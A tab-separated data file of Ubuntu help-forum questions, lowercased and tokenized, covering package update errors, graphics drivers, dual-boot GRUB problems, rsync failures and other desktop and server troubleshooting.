227200	how to fix `` e : some index files failed to download . they have been ignored , or old ones used instead . '' when tunning `` sudo apt-get update '' ?	this is what i get when i run sudo apt-get update : ign http : //ppa.launchpad.net quantal inrelease ign http : //ppa.launchpad.net quantal inrelease get:1 http : //dl.google.com stable inrelease [ 1,540 b ] ign http : //archive.ubuntu.com quantal inrelease ign http : //ppa.launchpad.net quantal inrelease ign http : //extras.ubuntu.com quantal inrelease ign http : //archive.ubuntu.com quantal-updates inrelease ign http : //archive.canonical.com quantal inrelease hit http : //dl.google.com stable release.gpg ign http : //archive.ubuntu.com quantal-backports inrelease hit http : //ppa.launchpad.net quantal release.gpg hit http : //extras.ubuntu.com quantal release.gpg ign http : //archive.canonical.com quantal inrelease ign http : //archive.ubuntu.com quantal-security inrelease hit http : //dl.google.com stable release hit http : //ppa.launchpad.net quantal release.gpg hit http : //extras.ubuntu.com quantal release ign http : //archive.ubuntu.com quantal-proposed inrelease hit http : //archive.canonical.com quantal release.gpg hit http : //archive.ubuntu.com quantal release.gpg hit http : //ppa.launchpad.net quantal release.gpg hit http : //extras.ubuntu.com quantal/main sources get:2 http : //archive.ubuntu.com quantal-updates release.gpg [ 933 b ] hit http : //archive.canonical.com quantal release.gpg hit http : //ppa.launchpad.net quantal release hit http : //archive.ubuntu.com quantal-backports release.gpg hit http : //extras.ubuntu.com quantal/main i386 packages hit http : //archive.canonical.com quantal release hit http : //archive.ubuntu.com quantal-security release.gpg hit http : //ppa.launchpad.net quantal release get:3 http : //archive.ubuntu.com quantal-proposed release.gpg [ 933 b ] hit http : //archive.canonical.com quantal release hit http : //ppa.launchpad.net quantal release hit http : //archive.ubuntu.com quantal release hit http : //archive.canonical.com quantal/partner sources get:4 http : //archive.ubuntu.com quantal-updates release [ 49.6 kb ] hit http : //ppa.launchpad.net quantal/main sources hit http : //archive.canonical.com quantal/partner i386 packages hit http : //ppa.launchpad.net quantal/main i386 packages hit http : //archive.ubuntu.com quantal-backports release hit http : //archive.ubuntu.com quantal-security release hit http : //archive.canonical.com quantal/partner sources get:5 http : //archive.ubuntu.com quantal-proposed release [ 49.6 kb ] hit http : //ppa.launchpad.net quantal/main sources hit http : //archive.canonical.com quantal/partner i386 packages hit http : //ppa.launchpad.net quantal/main i386 packages ign http : //extras.ubuntu.com quantal/main translation-en_us ign http : //extras.ubuntu.com quantal/main translation-en hit http : //archive.ubuntu.com quantal/main sources hit http : //archive.ubuntu.com quantal/restricted sources hit http : //ppa.launchpad.net quantal/main sources hit http : //archive.ubuntu.com quantal/universe sources hit http : //ppa.launchpad.net quantal/main i386 packages hit http : //archive.ubuntu.com quantal/multiverse sources hit http : //archive.ubuntu.com quantal/main i386 packages hit http : //archive.ubuntu.com quantal/restricted i386 packages hit http : //archive.ubuntu.com quantal/universe i386 packages hit http : //archive.ubuntu.com quantal/multiverse i386 packages hit http : //archive.ubuntu.com quantal/main translation-en hit http : //archive.ubuntu.com quantal/multiverse translation-en hit http : //archive.ubuntu.com quantal/restricted translation-en ign http : //archive.canonical.com quantal/partner translation-en_us hit http : //archive.ubuntu.com quantal/universe translation-en ign http : //archive.canonical.com quantal/partner translation-en get:6 http : //archive.ubuntu.com quantal-updates/main sources [ 50.9 kb ] ign http : //archive.canonical.com quantal/partner translation-en_us ign http : //archive.canonical.com quantal/partner translation-en get:7 http : //archive.ubuntu.com quantal-updates/restricted sources [ 889 b ] get:8 http : //archive.ubuntu.com quantal-updates/universe sources [ 22.2 kb ] ign http : //ppa.launchpad.net quantal/main translation-en_us ign http : //ppa.launchpad.net quantal/main translation-en ign http : //ppa.launchpad.net quantal/main translation-en_us get:9 http : //archive.ubuntu.com quantal-updates/multiverse sources [ 2,940 b ] get:10 http : //archive.ubuntu.com quantal-updates/main i386 packages [ 127 kb ] ign http : //ppa.launchpad.net quantal/main translation-en ign http : //ppa.launchpad.net quantal/main translation-en_us ign http : //ppa.launchpad.net quantal/main translation-en get:11 http : //archive.ubuntu.com quantal-updates/restricted i386 packages [ 1,979 b ] get:12 http : //archive.ubuntu.com quantal-updates/universe i386 packages [ 67.5 kb ] get:13 http : //archive.ubuntu.com quantal-updates/multiverse i386 packages [ 8,121 b ] hit http : //archive.ubuntu.com quantal-updates/main translation-en hit http : //archive.ubuntu.com quantal-updates/multiverse translation-en hit http : //archive.ubuntu.com quantal-updates/restricted translation-en hit http : //archive.ubuntu.com quantal-updates/universe translation-en hit http : //archive.ubuntu.com quantal-backports/main sources hit http : //archive.ubuntu.com quantal-backports/restricted sources hit http : //archive.ubuntu.com quantal-backports/universe sources hit http : //archive.ubuntu.com quantal-backports/multiverse sources hit http : //archive.ubuntu.com quantal-backports/main i386 packages hit http : //archive.ubuntu.com quantal-backports/restricted i386 packages hit http : //archive.ubuntu.com quantal-backports/universe i386 packages hit http : //archive.ubuntu.com quantal-backports/multiverse i386 packages hit http : //archive.ubuntu.com quantal-backports/main translation-en hit http : //archive.ubuntu.com quantal-backports/multiverse translation-en hit http : //archive.ubuntu.com quantal-backports/restricted translation-en hit http : //archive.ubuntu.com quantal-backports/universe translation-en hit http : //archive.ubuntu.com quantal-security/main sources hit http : //archive.ubuntu.com quantal-security/restricted sources hit http : //archive.ubuntu.com quantal-security/universe sources hit http : //archive.ubuntu.com quantal-security/multiverse sources hit http : //archive.ubuntu.com quantal-security/main i386 packages hit http : //archive.ubuntu.com quantal-security/restricted i386 packages hit http : //archive.ubuntu.com quantal-security/universe i386 packages hit http : //archive.ubuntu.com quantal-security/multiverse i386 packages hit http : //archive.ubuntu.com quantal-security/main translation-en hit http : //archive.ubuntu.com quantal-security/multiverse translation-en hit http : //archive.ubuntu.com quantal-security/restricted translation-en hit http : //archive.ubuntu.com quantal-security/universe translation-en get:14 http : //archive.ubuntu.com quantal-proposed/restricted i386 packages [ 14 b ] get:15 http : //archive.ubuntu.com quantal-proposed/main i386 packages [ 40.2 kb ] get:16 http : //archive.ubuntu.com quantal-proposed/multiverse i386 packages [ 14 b ] get:17 http : //archive.ubuntu.com quantal-proposed/universe i386 packages [ 81.3 kb ] hit http : //archive.ubuntu.com quantal-proposed/main translation-en hit http : //archive.ubuntu.com quantal-proposed/multiverse translation-en hit http : //archive.ubuntu.com quantal-proposed/restricted translation-en hit http : //archive.ubuntu.com quantal-proposed/universe translation-en ign http : //archive.ubuntu.com quantal/main translation-en_us ign http : //archive.ubuntu.com quantal/multiverse translation-en_us ign http : //archive.ubuntu.com quantal/restricted translation-en_us ign http : //archive.ubuntu.com quantal/universe translation-en_us ign http : //archive.ubuntu.com quantal-updates/main translation-en_us ign http : //archive.ubuntu.com quantal-updates/multiverse translation-en_us ign http : //archive.ubuntu.com quantal-updates/restricted translation-en_us ign http : //archive.ubuntu.com quantal-updates/universe translation-en_us ign http : //archive.ubuntu.com quantal-backports/main translation-en_us ign http : //archive.ubuntu.com quantal-backports/multiverse translation-en_us ign http : //archive.ubuntu.com quantal-backports/restricted translation-en_us ign http : //archive.ubuntu.com quantal-backports/universe translation-en_us ign http : //archive.ubuntu.com quantal-security/main translation-en_us ign http : //archive.ubuntu.com quantal-security/multiverse translation-en_us ign http : //archive.ubuntu.com quantal-security/restricted translation-en_us ign http : //archive.ubuntu.com quantal-security/universe translation-en_us ign http : //archive.ubuntu.com quantal-proposed/main translation-en_us ign http : //archive.ubuntu.com quantal-proposed/multiverse translation-en_us ign http : //archive.ubuntu.com quantal-proposed/restricted translation-en_us ign http : //archive.ubuntu.com quantal-proposed/universe translation-en_us fetched 506 kb in 45s ( 11.0 kb/s ) w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release unable to find expected entry 'main/source/sources ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . as i am a noob to ubuntu , can you give me a step by step advice for dummies , please ?
227201	dual displays not working , white backgorund	my problem is that my second display is white . the things i 've tried is : system settings > displays > enable display . then i get : required virtual size does not fit available size : requested= ( 3840 , 1200 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) i downloaded the latest driver and ccc . then i tried to use catalyst control center and enabling the display there , then where i got the white display after rebooting . this is how my driver looks like : $ lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati cayman xt [ radeon hd 6970 ] this is how my x11 xorg.conf look like : section `` serverlayout '' identifier `` amdcccle layout '' screen 0 `` amdcccle-screen [ 1 ] -0 '' 0 0 screen `` amdcccle-screen [ 1 ] -1 '' 1920 0 endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` 0-dfp9 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' option `` preferredmode '' `` 1920x1080 '' endsection section `` monitor '' identifier `` 0-dfp11 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1200 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -0 '' driver `` fglrx '' option `` monitor-dfp9 '' `` 0-dfp9 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -1 '' driver `` fglrx '' option `` monitor-dfp11 '' `` 0-dfp11 '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -0 '' device `` amdcccle-device [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -1 '' device `` amdcccle-device [ 1 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
227202	trouble running matlab 2012a on ubuntu 12.04 64 bits	i just finished a matlab 2012a installation that reported that the c compiler needs to be upgraded , but got stuck when i tried to click on the hyperlink provided by the installer to fix it . when trying the new installation i get this : sudo sh matlab matlab : 1 : /home/antonio/matlab/bin/util/oscheck.sh : /lib64/libc.so.6 : not found is this due to the compiler issue ? how do i fix this ?
227203	how do i partition a drive so that the data is separate from the operating system ?	i 'm planing to install ubuntu 12.10 in a dell inspiron 17 laptop as the unique operating system . i would like to know how to partition the drive in order to have my data separate from the operating system . is it better to do it in the installation or i could go with the default and then use gparted to do the job ? where can i find some tutorials on this ? i 'm finding lots of things with dual boot , but i 'm not interested on that .
227204	i tried to install `` ubuntu tweak '' but i ca n't find it now , how to fix this ?	after i installed tweak using `` sudo apt-get install tweak '' i went to dash home and i searched for `` ubuntu tweak '' but it did not find it , so i tried to install it again but it told me `` tweak is already the newest version . '' what should i do ?
227207	i need help with chromium	i am running ubuntu 12.10 on a eee pc 1001px and it feels pretty sluggish compared to the win7 that i had previously installed even though it is the only os on the machine right now . i installed chromium and tabs keep crashing with the 'he 's dead , jim ' message , which alludes that chromium is n't getting enough memory . i did not have this problem before the ubuntu install so i am guessing that there is some way to get it to allocate more of the one gig of ram installed so it wo n't crash as much .
227209	simple method to install a mail server	i am looking for a simple way to install a mail server on my ubuntu server . i would like to be able to receive and send emails though a webmail ( e.g . roundcube ) . i have a domain name . the web server already works without any problem . when i googled `` simple method to install mail server on ubuntu '' , i arrive on blogs with literally hundreds of steps to install a mail server : a mailserver on ubuntu 12.04 : postfix , dovecot , mysql creating a mail server on ubuntu postfix but , for sure i will make a mistake , if i follow those tutorials , and it will be very very time consuming . most of the steps look very easy to automate , though . i 've try several install methods : sudo apt-get install dovecot-postfix sudo tasksel install mail-server but from there , i have no idea how to add email accounts , and test if it actually works . do you know if there is an automated way to install a mail server ? edit - new answer mail-in-a-box a very interesting open source project that turns a ubuntu machine into an email server : https : //github.com/joshdata/mailinabox
227211	why is tinyproxy slow on ubuntu server 12.04 ?	i 'm trying to set up a proxy server on ubuntu 12.04 after squid stopped working . i am now trying to use tinyproxy . when i connect the first time it works at normal speed and then it stops connections to the internet . ( i 'm using dansguardian . )
227222	sound recorder not responding , ubuntu 12.10	i do n't know what is causing this . i 've noticed lately after upgrading the computer at church to ubuntu 12.10 , the sound recorder will not record when the record button is pressed , and when i press it again , the message to continue without saving comes up . no matter what i choose the program completely locks up , and the only way i can quit the program is by going to system monitor and ending the process , i then reopen the sound recorder and it then works properly . any thoughts as to what can be done to fix this ?
227224	`` firmware missing '' on ubuntu 12.04	i am new to ubuntu and things have gone pretty smooth but i am in need of help when it says `` firmware missing '' under my wireless status bar . what do i need to do exactly ? i have a cd with my d-link router that you are supposed to install but it does n't work on ubuntu either . i tried downloading bw43-cutter but i am not even sure on how to install it or what it is . thanks .
227227	i broke x , probably by installing a proprietary nvidia driver . how can i get my x server back ?	when i start my computer , i get a text login -- it does n't even load lightdm . dmesg gives me this : [ 42.367035 ] nvrm : api mismatch : the client has the version 304.43 , but [ 42.367038 ] nvrm : this kernel module has the version 310.14 . please [ 42.367040 ] nvrm : make sure that this kernel module and all nvidia driver [ 42.367041 ] nvrm : components have the same version . [ 42.619472 ] init : lightdm main process ( 1235 ) terminated with status 1 [ 48.041960 ] vboxdrv : found 1 processor cores . [ 48.044418 ] vboxdrv : tsc mode is 'synchronous ' , kernel timer mode is 'normal ' . [ 48.044422 ] vboxdrv : successfully loaded version 4.1.12_ubuntu ( interface 0x00190000 ) . [ 48.459287 ] vboxpci : iommu not found ( not registered ) [ 50.544026 ] wlan0 : no ipv6 routers present [ 52.729171 ] init : failed to spawn vsftpd main process : unable to execute : no such file or directory [ 58.435781 ] init : plymouth-stop pre-start process ( 2306 ) terminated with status 1 [ 59.169528 ] init : failsafe-x main process ( 1429 ) terminated with status 1 i do n't know how much of this is relevant . i think this problem started around when i tried to install new proprietary nvidia drivers . how can i get x back ? i would install older drivers using the additional drivers program , except i ca n't start any version of x .
227228	kubuntu 12.04 desktop has disappeared	the kubuntu 12.04 desktop has disappeared . the taskbar is gone . the icons are incorrect , i.e. , the images are either blank or for executables are a diamond filled with two ratchet wheels . i have run sudo apt-get install kubuntu-desktop to no avail . i have also run kfce4-install , but it did not help . previously i could copy ~/.kde4 to somewhere else . now there is no .kde4 , but there is a .kde which i have also tried to copy away but that also does not have any positive effect .
227229	using a livecd on an intel imac	i have a livecd that works on windows . when i boot the mac with it in and hold the option button , it shows the hard drive , a cd called `` windows '' and a cd called `` efi boot '' . if i click on the windows cd it says [ no text here ] [ no text here either ] select cd boot type : and it does n't allow me to input anything . if i click on efi boot , it gives me a command prompt but i do n't know what do do there . anyone know what i 'm doing wrong ?
227230	automount disk on boot	i 've used xbmc live in the past and have been happy with manually editing /etc/fstab to configure disks to automatically mount . now i am running ubuntu 12.10 . within `` disks '' i have the mount options on the drives set to `` automatic mount options : on '' but the disks are'nt mounted until i access them . the disks are n't listed in /etc/fstab- i could add them by hand , but i am expecting the gui to take care of it ? is there something i 'm missing ?
227231	ca n't fix broken packages using synaptic ( broken package : wine1.4 )	ok so i am trying to fix a broken package in order to install wine . when i do `` sudo apt-get install wine '' i get : sam @ ubuntu : ~ $ sudo apt-get install wine [ sudo ] password for sam : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.4 but it is not going to be installed e : unable to correct problems , you have held broken packages . then i try `` sudo apt-get install wine1.4 '' sam @ ubuntu : ~ $ sudo apt-get install wine1.4 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.4 : depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . so someone told me to try synaptic . here is what i tried : searched wine right clicked wine1.4 said i needed to mark other packages mark i click apply . it says , you have to fix broken packages first ! i do edit > fix broken packages i get this e : unable to correct problems , you have held broken packages . e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies i am really frustrated . i removed the official wine ppa and tried it i even tried $ sudo apt-get -f install 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . please help me : ( system : ubuntu 12.10 64bit
227237	pound sign and shift-tilde in aterm	i 'm having an issue with aterm whereby typeing the pound sign ( shift+3 ) gives me 'å£ ' , and shift-tilde gives 'å¬ ' . these keys are the only two which do n't work properly . interestingly they work absolutely fine in xterm and lxterminal ... does anyone have any idea what might be going on ?
227238	flash suddenly insanely jerky ( but low cpu consumption )	i 'm using 11.04 ( i know that support has been dropped ) 32bit on my desktop machine . i never had performance problems with adobe flash on ubuntu . but since today , all flash videos in browsers are insanely jerky so that i ca n't enjoy watching them . cpu usage is at about 20 % . i really do n't know what happened . the only thing changed since it worked last time was that i plugged my tv as a second monitor on my graphics card and mirrored the screen . i have an nvidia gtx 560ti and use the driver version 173 . i tried both firefox and chromium , with both flashplayer-installer and adobe-flashplugin - none of them worked . https : //www.adobe.com/software/flash/about/ tells me that i have flash version 11.2.202.243 . it 's strange that they say that 11.2.202.251 should be available , but i think this is an update issue of my outdated ubuntu version ( 11.04 ) . if i could at least find out what the bottleneck is ... cpu usage is very low as already said , it also is n't a buffering issue ( html5 plays very well by the way ) . i do n't know how to get the gpu usage , however , the nvidia gui reports no increasing temperature . do you have any idea what is causing this issue ?
227240	missing sound-volume-applet	i am using ubuntu 12.10 . i had some problems with my skype and audio . so i did the following and it 's working fine now : sudo apt-get purge pulseaudio sudo apt-get autoremove sudo reboot after this i reinstalled pulseaudio via sudo apt-get install pulseaudio but now my icon in the gnome-panel is missing . after searching on google i found that that the sound-volume-applet ist missing . so is this right ? and do you get the icon in the panel ?
227243	pdf not printing on printer shared via cups/samba	i have a printer ( brother hl-2035 ) attached to an ubuntu server ( latest version ) via usb and shared via samba/cups . on my clients ( win7 ) i can print from word , etc. , this just works fine . the only thing , not working is printing pdf files from acrobat reader . the print dialog shows correctly on the win7 clients and printing finishes without errors , but the printer doesnt print any page and doesnt report any error . the cups print queue even does not list the pdf printing job , whilst listing other jobs from other applications . i already tried to set up a `` raw '' printer in cups ... same symptoms . anybody with a solution ?
227244	does n't kill the process	i have to kill mysqld process but after it had killed the same process constituted in a different way as a new pid number . e.g : ak @ ak-easynote-tm98 : ~ $ ps -aux|grep mysql mysqld start mysql 6894 7.0 1.4 484304 42940 ? ssl 21:13 ... and than l get the below : ak @ ak-easynote-tm98 : ~ $ ps -aux|grep mysqld mysqld start mysql 6894 7.0 1.4 484304 42940 ? ssl 21:13 ... how can i find a solution ?
227246	make the pop up windows of chrome or firefox to open in the same monitor	i use dual monitor for my laptop , i work on my laptop and watch tv or youtube on the external monitor [ which is far from my laptop ] whenever firefox or chrome in ubuntu pops up , [ for example to upload a file ] or it pop up in the external monitor , how can i force it to pop up in the same monitor that i am working on ? [ usualy laptop one ]
227248	installed from windows vista but get flashing screen trying to boot	i ran the windows ( vista ) based installer and everything appeared to be successful except when i choose ubuntu from the boot menu , the screen flashes between red , green , blue , black and white . i have tried the various diagnostic options without success except that one time i got in and got the desktop but had dns access ( i.e. , nslookup worked ) but could not ping any external sites . now i have not been able to get back to that point . i am installing on an old dell m1730 running vista . i am pretty comfortable with ubuntu once i get the thing started : - ) , as i use it at work ( and years ago i put myself through grad school as a unix syadmin ! ) . cheers , lyman
227251	easy installation of wordpress ?	i am wordpress theme and website developer . back in windows i use wamp server to access and develop themes in wordpress now in ubuntu the process is heavy . i mean i have to install apache , php , mysql and have to create databases using terminal ( in windows i can do this by using wamp user interface and deploying is also very simple ) . so please help me to choose the best server for wordpress . and finally are there any server like wamp in ubuntu ? i am using ubuntu 12.10 desktop 32bit version !
227256	how to use getures on clickpad ? ( gnome- shell )	i have installed ubuntu 12.10 on my acer apsire v5 touch , and i want to know hot to activate the gestures on my clickpad in gnome shell , because in unity i can use them with no problems . i really like unity more than gnome- shell , but i use the laptop to work and i need something usable and stable , and the globar menu bar , in the 12.10 version has a lot of bugs . so , is there a way to use the gestures on gnome shell ? gestures : pinch to zoom move windows with 3 fingers '' natural scroll '' etc ... and if it 's possible to fully use the touch screen , because it fails when i do a click on it .
227258	`error ! could not locate dkms.conf file`	during a recent apt-get dist-upgrade of 12.10 i received the following error : setting up linux-headers-3.5.0-19-generic ( 3.5.0-19.30 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.5.0-19-generic /boot/vmlinuz-3.5.0-19-generic error ! could not locate dkms.conf file . file : does not exist . any ideas ?
227259	problems with booting linux after updating kernel	after updating linux headers from 3.5.0-19 into 3.5.0-20 i faced booting problem . i do n't know reason , sometimes boots normally , but sometimes i need to reboot 3-4 times . i tried to boot with recovery mode , but i did n't see any error there . but with 3.5.0-19 linux boots normally . what 's the problem with 3.5.0-20 ?
227261	how do i set a password for guest login	want to set a guest session password for login . how do you do this after skipping it at os install ?
227266	cantgive access to my webcam on websites	i am using ubuntu 12.10 . when i try to use websites that access my webcam ( ustream for example ) , the dialog where you allow access is not clickable . ( see image ) i have the latest flash player installed , have cleared my cache , nothing seems to fix it . it works fine on my mint machine ( which is the exact same model laptop - hp envy6 ) . any cles how to fix this ?
227269	using upstart like old fashion init script	how can i use upstart and have the same we use to have by using `` # should-start : '' at the begin init info of the init script ? is it there any way i can tailor the `` start on started '' based on a variable ?
227270	alternative panel for a custom compiz session for ubuntu 12.10 ?	i really do n't want to use any existing de out there , so i have decided to put together custom compiz session with probably a dock such as dockbarx or docky . now i just need a decent panel to use , i remeber i could use the unity-2d-panel but not anymore since its dropped from 12.10 . any suggestions ? so far i have tried tint2 , xfce4-panel , and wingpanel .
227271	checking version of nodejs returns nothing	i 'm trying to install node js onto ubuntu so that i can run angularjs . i 'm not sure if i 've installed it before so i ran sudo-apt get install node and once that is done i then run node -- version but nothing is returned on my terminal . jason @ jason : ~ $ node -- version jason @ jason : ~ $ how do i check if nodejs is installed ?
227274	rsync : link_stat < path > failed : no such file or directory ( 2 )	working with rsync on a command line project to sync my phone with my music folder based on a number of ... options . not sure why it 's failing , but here goes : the command : sudo rsync -arvrn -- progress -- temp-dir=/home/test/ -- files-from=/home/test/scripts/phone-music-sync.txt /home/test/music/ /home/test/phone/sdcard/music/ and the phone-music-sync.txt file : artist\ path/album\ path/ artist2\ path/ i get the following errors : rsync : link_stat `` artist\ path/album\ path '' failed : no such file or directory ( 2 ) rsync : link_stat `` artist2\ path/ '' failed : no such file or directory ( 2 ) now -- not sure what i am doing wrong here , but i can cd into the directories just fine . i can see the files . if i get rid of the -- files-from entry and replace it with an individual path , the rsync will work fine . so : the directories do exist , and there are almost always spaces in the path names . there are files in the first entry and directories to recurse in the second entry of phone-music-sync.txt . because of something i ca n't quite figure out i have to sudo the command , because the phone mounts for only the root user to use . thoughts ? been driving me nuts . : ) -chow
227277	scientific diagram drawing software	i want to draw mathematical pictures like graphs but just simple ones like a quick sketch of an exponential decay crossing at a point marked a or something like that , and i want to draw a picture of a diagram of some equipment , like a lens and a light ray being sent through a pinhole and projected onto a screen . diagrams like this : but so they look more like this : and : is there any software on ubuntu that 'll let me do this easily and accurately ?
227282	how to connect to the internet	the it guy at my mom 's office had an old computer that he could give me to make a server out of . i took it and installed ubuntu server 12.04.1 lts on it . however , i have no connection to the internet and i ca n't figure out how to connect . the preferred end result would be a wireless connection , but for now i 'd be happy with any connection , wireless or otherwise . i ran sudo apt-get update and that returned a whole list of w : failed to fetch [ some arbitrary website ] i read up on a few articles and took this error to mean that i am not connected to the internet . how do i connect ? note : although i have been using servers/computers/etc . for a while , i am extremely new to ubuntu . ( i have only been using it for 1 day . ) if anyone knows how to fix this or even has a pointer in the right direction , i would be very grateful . thanks , dylan
227283	how to get rid of windows	i think the answer must be very simple , but i still do n't know it . i have installed ubuntu 12.10 in my windows 7 laptop . after installing ubuntu and started using it i decided to restart my laptop . but when i turned it on again , it still asks me if i want to use windows 7 or ubuntu . how can i get rid of windows 7 so as to start directly from ubuntu the next time i turn my computer on ? thanks !
227286	vdi to hard drive	is any way to copy file system from virtualbox .vdi file ( or others like that ) to physical partition on a hard drive ?
227290	windows 8 changes grub2 in every boot !	i 've installed windows 8 and ubuntu 12.10 both uefi style ( win8 first then ubuntu ) . grub2 shows me both ubuntu and win8 entries . if i boot into ubuntu is fine . i could reboot anytime i will see grub2 unchanged . the story changes when i boot into win8 . when i boot to win8 using grub2 it takes me to the windows boot manager ( which only has the windows 8 entry ) . i hit windows and it boots fine . when i reboot , there 's no grub2 nor win loader . it has no boot loader . i booted a livecd and downloaded boot-repair and everything is back . it 's a never ending cycle . is grub2 supposed to load the win boot loader ? what can i do to fix it ? more information : user @ machine : ~ $ ls -l `find /boot/efi -iname `` *\.efi '' ` -rwxr-xr-x 1 root root 1357480 dec 9 21:41 /boot/efi/efi/boot/bootx64.efi -rwxr-xr-x 1 root root 1357480 dec 9 21:41 /boot/efi/efi/microsoft/boot/bootmgfw.efi -rwxr-xr-x 1 root root 1350896 jul 25 20:57 /boot/efi/efi/microsoft/boot/bootmgr.efi -rwxr-xr-x 1 root root 1357480 dec 9 21:41 /boot/efi/efi/microsoft/boot/bootx64.efi -rwxr-xr-x 1 root root 1263856 jul 25 20:57 /boot/efi/efi/microsoft/boot/memtest.efi -rwxr-xr-x 1 root root 897400 dec 9 21:41 /boot/efi/efi/ubuntu/grubx64.efi -rwxr-xr-x 1 root root 1357480 dec 9 21:41 /boot/efi/efi/ubuntu/shimx64.efi user @ machine : ~ $ ls -l `find /boot/efi -iname `` *\.bkp '' ` -rwxr-xr-x 1 root root 1354480 jul 25 20:57 /boot/efi/efi/boot/bootx64.efi.bkp -rwxr-xr-x 1 root root 1354480 jul 25 20:57 /boot/efi/efi/microsoft/boot/bootmgfw.efi.bkp user @ machine : ~ $ sudo parted /dev/sda print model : ata st31000524as ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 316mb 315mb ntfs basic data partition hidden , diag 2 316mb 420mb 105mb fat32 efi system partition boot 3 420mb 555mb 134mb microsoft reserved partition msftres 4 555mb 751gb 750gb ntfs basic data partition 5 751gb 998gb 248gb ext4 6 998gb 1000gb 2000mb linux-swap ( v1 )
227292	huge mouse cursor arrow after installing nvidia drivers	after installing the proprietary nvidia drivers , my mouse cursor looks like this : the arrow image is much larger than normal . how can i fix it ? details how i installed the nvidia drivers : install linux-source , linux-headers-generic , and nvidia-current-updates , then reboot . run sudo nvidia-xconfig . run gksudo nvidia-settings , adjust the absolute position of my two monitors , and save the automatically generated xorg.conf . apply the workaround for bug # 1057000 to xorg.conf , then reboot . the cursor size settings referred to in this answer are normal . the problem does not happen when the mouse pointer is over amarok or firefox .
227294	advice for debugging apport-gpu-error-intel.py crashes ?	ever since upgrading from 12.04 to 12.10 , after logging in i invariably get a `` ubuntu has detected an error '' related to apport-gpu-error-intel.py . googling around shows that launchpad has some reference to this issue : https : //bugs.launchpad.net/ubuntu/+source/apport/+bug/846026 , but reports the issue as invalid and closed by the 11.10 release . have other users encountered this in 12.10 ? what are my next steps to track down the source of this problem & avoid it ?
227297	can not make wireless `` forget '' networks to which it can not connect	i see that i can delete networks that my machine `` remembers '' from nm-applet by clicking on the wireless icon in the panel and selecting `` edit connections '' - > `` wireless '' . however , sometimes i click on the wrong wireless connection by accident in the dropdown list . if the connection is secure , the machine of course never successfully connects , but somehow it still seems to memorize the essid . whenever i 'm in range of that wireless , it now tries to connect . worse , if not connected to any other network , it repeatedly prompts me to connect to this network . if left unattended , i may find dozens of copies of the window prompting me to log in to this mistaken network . there must be a file somewhere that records this connection id , but i can not find it . the only connections appearing in the `` edit connections '' i mention above are those to which i 've actually connected . how do i find the file and delete the line corresponding to the offending `` memorized '' network ? edit i seek a solution to remove those networks from whatever list they get added to when i first select them . it appears this behavior is a bug in the network manager ( ? )
227301	hide or change 'ubuntu desktop ' on upper bar	how do i hide or change the wording on the top bar in ubuntu 12.04 ? i 'd like to alter it from 'ubuntu desktop ' to 'mac os x ' but i am unsure of how to do this . there was a thread explaining this a while ago but i did n't understand the process completely meaning i have n't been able to give it a go . hope you can help , ubunturob .
227306	xmonad keyboard does n't work	i 'm experimenting with xmonad , which i installed from the ubuntu software centre on ubuntu 12.10 . it looks cool , but when i invoke it ( using xmonad -- replace from the command line ) my title bars disappear and my keyboard stops working . at all . the terminal stops working , the keystrokes i 've seen in online `` getting started '' guides are ignored , and the only way for me to actually power the system off is to hit the reset button or ssh in from my phone . ironically , my mouse still works . one guide i saw suggested replacing the default window environment with xmonad , but i 'm afraid of rendering my system completely inoperable if i do that . any suggestions ?
227314	is there a way to make `` apt : // '' urls always open in the terminal	i would like to be able to install stuff straight from apps.ubuntu.com , but the software center takes a long time to load up and install stuff . is there a way to set `` apt '' uris to open up in the terminal as `` sudo apt-get install x edit : i am using chrome . is there some kind of extension that can do this ?
227316	how do i get the power manager settings to stick in lubuntu 12.10	i am unable to utilize the power manager settings ( xfce power manager ) that control the monitor to `` switch off '' after becoming inactive . i have selected numerous settings between 1 to 10 minutes . i prefer to have the monitor to switch off not sleep .
